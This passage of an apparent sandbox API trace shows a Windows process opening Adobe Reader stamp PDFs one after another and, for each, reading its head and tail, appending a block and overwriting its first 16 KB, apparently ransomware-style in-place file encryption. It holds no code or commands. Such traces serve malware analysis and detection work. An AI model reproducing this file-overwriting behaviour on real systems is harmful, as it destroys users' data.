lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.809] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.809] ReleaseMutex (hMutex=0x168) returned 1 [0075.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0075.809] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.811] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xbc2c [0075.811] ReadFile (in: hFile=0x1d8, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.812] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xbc2c [0075.812] WriteFile (in: hFile=0x1d8, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.813] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.813] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.813] CloseHandle (hObject=0x1d8) returned 1 [0075.814] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.815] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.815] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xff3a [0075.815] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.815] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.816] ReleaseMutex (hMutex=0x168) returned 1 [0075.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0075.816] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.843] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xef3a [0075.844] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.848] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xef3a [0075.848] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.849] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.849] WriteFile (in: hFile=0x1d8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.850] CloseHandle (hObject=0x1d8) returned 1 [0075.850] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.851] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.851] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xb731 [0075.851] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.851] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.851] ReleaseMutex (hMutex=0x168) returned 1 [0075.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0075.851] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.859] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xa731 [0075.860] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.862] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xa731 [0075.863] WriteFile (in: hFile=0x1d8, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.863] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.863] WriteFile (in: hFile=0x1d8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.863] CloseHandle (hObject=0x1d8) returned 1 [0075.864] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.865] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.865] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x80f5 [0075.865] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.865] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.865] ReleaseMutex (hMutex=0x168) returned 1 [0075.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0075.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0075.866] ReadFile (in: hFile=0x1d8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.875] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x70f5 [0075.875] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.879] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x70f5 [0075.879] WriteFile (in: hFile=0x1d8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.880] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.880] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.880] CloseHandle (hObject=0x1d8) returned 1 [0075.881] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0075.881] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.881] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa118 [0075.881] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0075.882] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.882] ReleaseMutex (hMutex=0x168) returned 1 [0075.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0075.882] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.884] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x9118 [0075.885] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.890] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x9118 [0075.890] WriteFile (in: hFile=0x1d8, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.891] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0075.891] WriteFile (in: hFile=0x1d8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.316] CloseHandle (hObject=0x1d8) returned 1 [0076.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0076.317] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.317] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x14758 [0076.317] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.318] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.318] ReleaseMutex (hMutex=0x168) returned 1 [0076.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0076.318] ReadFile (in: hFile=0x1d8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.320] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x13758 [0076.320] ReadFile (in: hFile=0x1d8, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.321] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x13758 [0076.322] WriteFile (in: hFile=0x1d8, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.322] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0076.322] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.322] CloseHandle (hObject=0x1d8) returned 1 [0076.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0076.324] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.324] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x9cbb [0076.324] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.324] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.324] ReleaseMutex (hMutex=0x168) returned 1 [0076.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0076.325] ReadFile (in: hFile=0x1d8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.327] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8cbb [0076.327] ReadFile (in: hFile=0x1d8, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.328] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8cbb [0076.328] WriteFile (in: hFile=0x1d8, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.329] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0076.329] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.330] CloseHandle (hObject=0x1d8) returned 1 [0076.330] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0076.331] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.331] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x992b [0076.331] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.331] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.332] ReleaseMutex (hMutex=0x168) returned 1 [0076.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0076.332] ReadFile (in: hFile=0x1d8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.334] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x892b [0076.334] ReadFile (in: hFile=0x1d8, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.335] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x892b [0076.335] WriteFile (in: hFile=0x1d8, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.336] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0076.336] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, 